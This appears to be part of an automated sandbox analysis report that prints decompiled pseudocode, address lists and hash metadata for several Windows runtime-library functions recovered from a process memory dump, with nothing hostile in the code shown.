0x04a7fcdc
0x00000000
0x04a7fcb8
0x04a7fcc3
0x04a7fcc5
0x04a7fcc7
0x00000000
0x04a7fcc9
0x04a7fcc9
0x04a7fccd
0x00000000
0x04a7fccd
0x04a7fcc7
0x00000000
0x04a7fc4b
0x04a7fc4b
0x04a7fc4e
0x04a7fc4e
0x04a7fc51
0x04a7fc51
0x04a7fc54
0x04a7fc5a
0x04a7fc5c
0x04a7fc5f
0x04a7fc61
0x04a7fc63
0x04a7fc65
0x04a7fc67
0x04a7fc6e
0x04a7fc72
0x04a7fc72
0x04a7fc72
0x04a7fc72
0x04a7fc67
0x04a7fc61
0x00000000
0x04a7fc5a
0x04a7fc49
0x04a7fc41
0x04a7fc30
0x04a7fc27
0x04a7fc03
0x04a7fbcd
0x04a7fbd3
0x04a7fbd9
0x04a7fbdc
0x04a7fbde
0x04a7fc99
0x04a7fc9b
0x04a7fc9d
0x04a7fcd5
0x04a7fcd5
0x04a7fc89
0x04a7fc89
0x00000000
0x04a7fc9f
0x04a7fc9f
0x04a7fca3
0x00000000
0x04a7fca3
0x00000000
0x04a7fbe4
0x04a7fbe4
0x04a7fbe4
0x04a7fbe4
0x04a7fbe9
0x04a7fbf2
0x00000000
0x04a7fbf2
0x04a7fbde
0x04a7fbcb
0x04a7fbab
0x04a7fc8b
0x04a7fc8b
0x04a7fc8c
0x04a7fb80
0x04a7fb72
0x04a7fb5e
0x04a7fc8d
0x04a7fc91
0x04a7fadf
0x04a7fadf
0x04a7fae1
0x04a7fae4
0x04a7fae7
0x04a7faec
0x04a7faf8
0x04a7fb00
0x04a7fb07
0x04a7fb0f
0x04a7fb0f
0x04a7fb07
0x00000000
0x04a7faf8
0x04a7fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04ABBE0F

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 11205f476dda018eafe944f1d62cf0fe09f049bb01e87fa6481d18ba32d8c4ee
Instruction ID: ad292e9856371536d0ead51818d1f960a04ed66dad4e398bff60aed677ae646b
Opcode Fuzzy Hash: 11205f476dda018eafe944f1d62cf0fe09f049bb01e87fa6481d18ba32d8c4ee
Instruction Fuzzy Hash: 5FA10571B006058FEB35DF68C8507BAB7B8AF48714F044569F946DBA91EB34FA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A42D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04A42D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4b35350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4b37bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04A897C0();
				}
				if( *0x4b379c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4b379c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04A71624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04A67D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04ADFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04A89520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04A7E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04A9DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4b36901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4b36901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04A89980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04A895D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04A67D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04A67D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04AC7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04ADFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4b35350;
							if(_t109 != 0x4b35350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04ADFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04AD5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x04a42d8a
0x04a42d8a
0x04a42d92
0x04a42d96
0x04a42d9e
0x04a42da0
0x04a42da3
0x04a42da5
0x04a42da8
0x04a42dab
0x04a42db2
0x04a9f9aa
0x04a9f9ab
0x04a9f9ae
0x04a9f9ae
0x04a42db8
0x04a42dc2
0x04a9f9b9
0x04a9f9be
0x04a9f9bf
0x04a9f9bf
0x04a42dcf
0x04a9f9c9
0x04a42dd5
0x04a42dd5
0x04a42dd5
0x04a42dde
0x04a42de1
0x04a42e70
0x04a42e72
0x04a42e72
0x04a42de7
0x04a42deb
0x04a42e7c
0x04a42e83
0x04a42e85
0x04a42e8b
0x04a42e8d
0x04a42e92
0x04a42e92
0x04a42e85
0x04a42df1
0x04a42df7
0x04a42df9
0x04a42df9
0x04a42dfc
0x04a42dff
0x04a42e02
0x00000000
0x04a42e05
0x04a42e0c
0x04a9f9d9
0x04a42e12
0x04a42e12
0x04a42e12
0x04a42e1a
0x04a9f9e3
0x04a9f9e9
0x04a9f9f0
0x04a9f9f6
0x04a9f9f8
0x04a9f9f8
0x04a9f9f0
0x04a42e23
0x04a9fa02
0x04a9fa03
0x04a9fa05
0x04a9fa06
0x00000000
0x04a42e29
0x04a42e29
0x04a42e2e
0x04a42e34
0x04a42e3e
0x00000000
0x00000000
0x04a42e44
0x04a42e47
0x04a42e4d
0x00000000
0x00000000
0x04a42e4f
0x04a42e54
0x00000000
0x00000000
0x04a42e5a
0x04a42e5f
0x04a42e9a
0x04a42ea4
0x04a42ea5
0x04a42ea8
0x04a42eaf
0x04a42eb2
0x04a42eb5
0x04a9fae9
0x04a9faeb
0x04a9faed
0x04a9faef
0x04a9faf7
0x04a9faf8
0x04a9fafd
0x04a9faff
0x04a9fb04
0x04a9fb04
0x04a9faff
0x04a42ec0
0x04a42ec4
0x04a42ec6
0x04a42ec8
0x04a9fb14
0x04a9fb18
0x04a9fb1e
0x04a9fb21
0x04a9fb21
0x04a42ece
0x04a42ece
0x04a42ece
0x04a42ed7
0x04a42e61
0x04a42e63
0x04a9fa6b
0x04a9fa71
0x04a9fa76
0x04a9fa78
0x04a9fa8a
0x04a9fa7a
0x04a9fa83
0x04a9fa83
0x04a9fa8f
0x04a9fa91
0x04a9fa97
0x04a9fa9d
0x04a9faa4
0x04a9faaa
0x04a9faaf
0x04a9fab1
0x04a9fac3
0x04a9fab3
0x04a9fabc
0x04a9fabc
0x04a9fac8
0x04a9facb
0x04a9fadf
0x04a9fadf
0x04a9facb
0x04a9faa4
0x04a9fa91
0x04a42e6f
0x04a42e6f
0x04a42e5f
0x04a9fa13
0x04a9fa15
0x04a9fa17
0x04a9fa1f
0x04a9fa21
0x04a9fa22
0x04a9fa25
0x04a9fa28
0x04a9fa2f
0x04a9fa2f
0x04a9fa2a
0x04a9fa2a
0x04a9fa2a
0x04a9fa31
0x04a9fa34
0x04a9fa36
0x04a9fa3c
0x04a9fa3e
0x04a9fa41
0x04a9fa43
0x04a9fa45
0x04a9fa45
0x04a9fa41
0x04a9fa3c
0x04a9fa4a
0x04a9fa4f
0x04a9fa51
0x04a9fa53
0x04a9fa56
0x04a9fa5b
0x04a9fa5e
0x00000000
0x04a9fa5e
0x04a42e23

Strings

RTL: Re-Waiting, xrefs: 04A9FA4A

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: af622b721efc92810a9de471a2675da99425b3e1bc66fa21f31d49801f7303dc
Instruction ID: cef5faf3dd467cf680b7e9efd22aaa9e40f1fe4ca693cf3a44b94c58a8ab00f1
Opcode Fuzzy Hash: af622b721efc92810a9de471a2675da99425b3e1bc66fa21f31d49801f7303dc
Instruction Fuzzy Hash: 3761F272A00604AFEB31DF68C981B7E7BF5EB84768F1406AAF512976C0D734BE008791

Uniqueness

Uniqueness Score: -1.00%

Function 04B10EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04B10EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04B0FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04B11074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04A89730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04B0A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04B0A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4b38b04 >> 0x14) + (_v44 -  *0x4b38b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04A67D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04B0138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04A67D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04AFFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4b38724 & 0x00000008) != 0) {
						E04B052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04B115B5(0x4b38ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x04b10eb7
0x04b10eb9
0x04b10ec0
0x04b10ec2
0x04b10ecd
0x04b1105b
0x04b1105b
0x04b11061
0x04b11066
0x04b11066
0x04b1106b
0x04b11073
0x04b11073
0x04b10ed3
0x04b10ed6
0x04b10edc
0x04b10ee0
0x04b10ee7
0x04b10ef0
0x04b10ef5
0x04b10efa
0x04b10efc
0x04b10efd
0x04b10f03
0x04b10f04
0x04b10f06
0x04b10f07
0x04b10f09
0x04b10f0e
0x04b10f14
0x04b10f23
0x04b10f2d
0x04b10f34
0x04b10f34
0x04b10f14
0x04b10f52
0x00000000
0x00000000
0x04b10f58
0x04b10f73
0x04b10f74
0x04b10f79
0x04b10f7d
0x04b10f80
0x04b10f86
0x04b10fab
0x04b10fb5
0x04b10fc6
0x04b10fd1
0x04b10fe3
0x04b10fd3
0x04b10fdc
0x04b10fdc
0x04b10feb
0x04b11009
0x04b11009
0x04b11015
0x04b11027
0x04b11017
0x04b11020
0x04b11020
0x04b1102f
0x04b1103c
0x04b1103c
0x04b11048
0x04b11050
0x04b11050
0x04b11055
0x00000000
0x04b11055
0x04b10f88
0x04b10f9e
0x04b10fa2
0x04b10fa9
0x00000000
0x00000000
0x00000000
0x04b10fa9
0x00000000

Strings

`, xrefs: 04B10F16

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: e2d7ceb928bca0569dd820166ebee76603054d1f5b47c59988a8078fe4d891b2
Instruction ID: c525dc279b0f57a468d46bb3bf1ad9989368d1f57dd2adfaaa6381d476d81c37
Opcode Fuzzy Hash: e2d7ceb928bca0569dd820166ebee76603054d1f5b47c59988a8078fe4d891b2
Instruction Fuzzy Hash: 8E51F1702043429FE324DF28D884B1BB7E5EBC8308F4449ADFA92976A0D770F845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A7F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04A7F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04A64120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04A89830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04A89990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04A895D0();
							goto L11;
						} else {
							_t109 = L04A64620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E04A8F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04A895D0();
										L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x04a7f0d3
0x04a7f0d9
0x04a7f0e0
0x04a7f0e7
0x04a7f0f2
0x04a7f0f4
0x04a7f0f8
0x04a7f100
0x04a7f108
0x04a7f10d
0x04a7f115
0x04a7f116
0x04a7f11f
0x04a7f123
0x04a7f124
0x04a7f12c
0x04a7f130
0x04a7f134
0x04a7f13d
0x04a7f144
0x04a7f14b
0x04a7f152
0x04abbab0
0x04abbab0
0x04a7f158
0x04a7f158
0x04a7f15a
0x04a7f160
0x04a7f165
0x04a7f166
0x04a7f16f
0x04a7f173
0x04abbaa7
0x04abbaa7
0x04abbaab
0x00000000
0x04a7f179
0x04a7f18d
0x04a7f191
0x04abbaa2
0x00000000
0x04a7f197
0x04a7f19b
0x04a7f1a2
0x04a7f1a9
0x04a7f1af
0x04a7f1b2
0x04a7f1b6
0x04a7f1b9
0x04a7f1c4
0x04a7f1d8
0x04a7f1df
0x04a7f1e3
0x04a7f1eb
0x04a7f1ee
0x04a7f1f4
0x04a7f20f
0x04abbab7
0x04abbabb
0x04abbacc
0x04abbad1
0x04a7f215
0x04a7f218
0x04a7f226
0x04a7f22b
0x00000000
0x04a7f22b
0x04a7f1f6
0x04a7f1f6
0x04a7f1f9
0x04a7f1fb
0x04a7f1fb
0x04a7f1f4
0x04a7f191
0x04a7f173
0x04a7f152
0x04a7f203

Strings

@, xrefs: 04A7F124

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: e8c9672756c0af1ae925e5f0ddf84fb18eed393ec65fcd952c1aedc43d1c52ca
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 94519E716057109FD320DF19C840A6BBBF8FF48754F00892DFA9697690E7B4E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04AC3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04AC3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4b3d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04A80BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04AC3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04A8FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04AC3540;
						E04A8FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04A9DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04AD0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04A897C0();
					}
					return E04A8B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04AC3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04AC3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04A8FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04A89650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04AC3787(_a4,  &_v352, _t80);
						}
					}
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04A895D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x04ac3552
0x04ac355a
0x04ac355d
0x04ac3566
0x04ac3567
0x04ac357e
0x04ac358f
0x04ac35a1
0x04ac35a5
0x04ac366b
0x04ac366b
0x04ac366d
0x04ac3672
0x04ac3679
0x04ac3685
0x04ac368d
0x04ac369d
0x04ac36a7
0x04ac36b8
0x04ac36c6
0x04ac36c7
0x04ac36dc
0x04ac36e1
0x04ac36e7
0x04ac36e9
0x04ac36e9
0x04ac3703
0x04ac3703
0x04ac35b5
0x04ac35c0
0x04ac35c4
0x00000000
0x00000000
0x04ac35ca
0x04ac35d7
0x04ac35e2
0x04ac35e6
0x04ac35e8
0x04ac35f5
0x04ac35fa
0x04ac3603
0x04ac3604
0x04ac3609
0x04ac360a
0x04ac3612
0x04ac3613
0x04ac361e
0x04ac3622
0x04ac3628
0x04ac362f
0x04ac362f
0x04ac3636
0x04ac3638
0x04ac363b
0x04ac3642
0x04ac3642
0x04ac3636
0x04ac3657
0x04ac3657
0x04ac365c
0x04ac3662
0x04ac3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 04AC358F

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 54586b2f7bd73ba80ab9e087767e0ec76642632d4650528163a99953d8d75046
Instruction ID: 23bb1d0b0d263b71f5d6032e61a03c5783f4d284447901933318aafa1f9be0b7
Opcode Fuzzy Hash: 54586b2f7bd73ba80ab9e087767e0ec76642632d4650528163a99953d8d75046
Instruction Fuzzy Hash: 0E4116F190152D9EEF61DB50CD84FEEB77CEB44718F0085A9AA09A7140DB30AE888F95

Uniqueness

Uniqueness Score: -1.00%

Function 04B105AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04B105AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04B107DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04A89730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E04B0A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E04B0A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04B11293(_t79, _v40, E04B107DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04A67D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04B0138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x04b105c5
0x04b105ca
0x04b105d3
0x04b106db
0x04b106db
0x04b106dd
0x04b106e3
0x04b106e3
0x04b105dd
0x04b105e7
0x04b105f6
0x04b10600
0x04b10607
0x04b10610
0x04b10615
0x04b1061a
0x04b1061c
0x04b1061e
